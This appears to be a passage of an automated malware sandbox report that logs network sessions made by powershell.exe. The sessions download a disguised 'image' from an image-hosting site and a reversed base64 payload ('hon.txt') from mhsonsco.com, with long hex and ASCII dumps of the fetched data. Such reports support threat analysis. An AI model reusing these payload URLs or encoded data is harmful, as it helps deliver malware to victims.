                                                                                                                              2024-04-24 04:48:16 UTC1369INData Raw: 0c 3a 7b e6 9b f8 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b
                                                                                                                              Data Ascii: :{Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk
                                                                                                                              2024-04-24 04:48:16 UTC1369INData Raw: 50 9d 34 84 31 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38
                                                                                                                              Data Ascii: P411Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8
                                                                                                                              2024-04-24 04:48:16 UTC1369INData Raw: 66 56 60 f2 1b 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12
                                                                                                                              Data Ascii: fV`lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*
                                                                                                                              2024-04-24 04:48:16 UTC1369INData Raw: 68 8b 20 46 55 5a b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68
                                                                                                                              Data Ascii: h FUZ@t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A h


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.549706172.67.215.454431472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-24 04:48:18 UTC100OUTGET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                                                                                                                              Host: uploaddeimagens.com.br
                                                                                                                              2024-04-24 04:48:18 UTC695INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 24 Apr 2024 04:48:18 GMT
                                                                                                                              Content-Type: image/jpeg
                                                                                                                              Content-Length: 4198361
                                                                                                                              Connection: close
                                                                                                                              Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                                                                                                                              ETag: "6627c3ad-400fd9"
                                                                                                                              Cache-Control: max-age=2678400
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 5950
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EojHSWwFog9GfZoT0FwVFLRP7vVVrJghP13VqI9PBh9clejRhV9Og1tZedZM9OngclpfBQ37tvuueF8zDEDYTmUl5Jf3bf%2BzbX%2FtEPM7RPPXArzzggovy6A3u3VeEGP%2B3D60nFYmEKB"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 879375d408432ad4-LAX
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-04-24 04:48:18 UTC674INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce
                                                                                                                              Data Ascii: .TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56
                                                                                                                              Data Ascii: %VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87
                                                                                                                              Data Ascii: Tr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82
                                                                                                                              Data Ascii: 2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92
                                                                                                                              Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a
                                                                                                                              Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49
                                                                                                                              Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92
                                                                                                                              Data Ascii: /mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@B
                                                                                                                              2024-04-24 04:48:18 UTC1369INData Raw: 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc
                                                                                                                              Data Ascii: t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.549707103.83.81.684431472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-24 04:48:25 UTC72OUTGET /ab/hon.txt HTTP/1.1
                                                                                                                              Host: mhsonsco.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-04-24 04:48:25 UTC235INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 24 Apr 2024 04:52:04 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Wed, 24 Apr 2024 00:33:03 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 324268
                                                                                                                              Content-Type: text/plain
                                                                                                                              2024-04-24 04:48:25 UTC7957INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                              Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 46 6f 45 78 46 6f 45 42 4d 41 41 4b 67 67 44 42 49 6f 45 46 30 52 76 42 4b 52 41 43 4b 52 42 64 55 51 48 46 30 52 42 64 55 51 48 68 49 6f 45 46 30 52 44 48 34 42 43 49 34 77 41 4f 34 67 42 48 67 51 42 49 45 41 41 45 67 41 50 42 4b 42 43 4f 30 52 42 64 55 51 48 49 67 51 42 64 34 41 50 42 4b 52 41 4e 4a 52 46 4f 77 77 42 61 67 41 43 49 30 42 43 49 30 42 43 64 67 51 48 49 67 51 48 49 67 41 43 49 30 42 43 64 34 77 44 48 67 42 43 49 55 51 48 49 4d 41 49 48 6f 41 43 42 41 41 42 64 49 59 45 5a 49 59 45 56 49 59 45 4f 45 41 42 67 30 41 43 38 45 6f 45 42 6b 4f 67 52 55 68 44 42 6b 4f 67 52 55 68 44 42 6b 4f 67 52 55 68 44 42 6b 4f 67 52 55 42 50 42 4b 52 41 4e 4a 52 46 38 45 6f 45 43 34 41 43 49 67 41 43 38 45 6f 45 49 34 67 41 43 55 51 48 49 30 67 67 53 34 67 44
                                                                                                                              Data Ascii: FoExFoEBMAAKggDBIoEF0RvBKRACKRBdUQHF0RBdUQHhIoEF0RDH4BCI4wAO4gBHgQBIEAAEgAPBKBCO0RBdUQHIgQBd4APBKRANJRFOwwBagACI0BCI0BCdgQHIgQHIgACI0BCd4wDHgBCIUQHIMAIHoACBAABdIYEZIYEVIYEOEABg0AC8EoEBkOgRUhDBkOgRUhDBkOgRUhDBkOgRUBPBKRANJRF8EoEC4ACIgAC8EoEI4gACUQHI0ggS4gD
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 41 67 4f 41 55 47 41 36 42 51 61 41 4d 46 41 6c 42 67 63 41 38 47 41 30 42 77 55 76 41 41 41 70 41 51 66 41 41 44 41 37 42 41 4b 41 41 43 41 34 41 41 49 41 34 47 41 68 42 41 61 41 51 48 41 67 41 77 63 41 4d 48 41 6c 42 41 62 41 41 43 41 7a 42 51 61 41 41 43 41 6c 42 67 63 41 38 47 41 30 42 77 55 41 6b 48 41 30 42 67 63 41 55 47 41 77 42 77 62 41 49 48 41 51 42 41 5a 41 55 47 41 36 42 51 61 41 77 47 41 68 42 51 61 41 49 48 41 6c 42 77 55 41 41 43 41 6c 42 41 61 41 51 48 41 67 41 67 5a 41 38 47 41 67 41 51 5a 41 6f 48 41 70 42 77 55 78 42 41 41 39 42 41 57 41 6f 44 41 77 41 77 65 41 67 48 41 77 41 41 49 41 6f 44 41 45 42 51 53 58 41 41 41 70 41 51 66 41 45 44 41 37 42 41 4b 41 41 43 41 39 42 41 4d 41 73 48 41 67 41 77 62 41 51 48 41 67 41 41 62 41 45 47 41
                                                                                                                              Data Ascii: AgOAUGA6BQaAMFAlBgcA8GA0BwUvAAApAQfAADA7BAKAACA4AAIA4GAhBAaAQHAgAwcAMHAlBAbAACAzBQaAACAlBgcA8GA0BwUAkHA0BgcAUGAwBwbAIHAQBAZAUGA6BQaAwGAhBQaAIHAlBwUAACAlBAaAQHAgAgZA8GAgAQZAoHApBwUxBAA9BAWAoDAwAweAgHAwAAIAoDAEBQSXAAApAQfAEDA7BAKAACA9BAMAsHAgAwbAQHAgAAbAEGA
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 42 51 61 41 63 47 41 76 42 41 62 58 45 41 41 64 42 67 52 41 63 44 41 77 41 41 4d 41 55 48 41 63 42 51 4c 41 41 44 41 79 41 41 4d 41 41 44 41 31 42 41 58 41 34 46 41 62 46 43 41 41 49 43 41 70 41 77 50 41 6f 43 41 75 41 41 4b 41 49 43 41 36 41 67 49 41 6b 43 41 6c 42 51 62 41 45 47 41 75 42 67 63 41 55 47 41 7a 42 51 56 41 51 47 41 6c 42 41 64 41 41 48 41 35 42 67 63 41 4d 47 41 75 42 51 5a 41 77 48 41 6b 42 67 63 41 38 47 41 33 42 77 63 41 4d 48 41 68 42 41 55 41 51 47 41 6c 42 41 64 41 41 48 41 35 42 67 63 41 4d 47 41 75 42 51 5a 41 77 48 41 6c 42 51 62 41 45 47 41 75 42 41 64 41 4d 48 41 76 42 41 61 41 67 43 41 69 41 41 58 7a 46 41 41 70 41 77 4b 41 30 46 41 74 41 41 58 41 34 43 41 63 42 77 4c 41 77 46 41 35 41 51 4c 41 41 44 41 36 42 51 4c 41 45 45 41
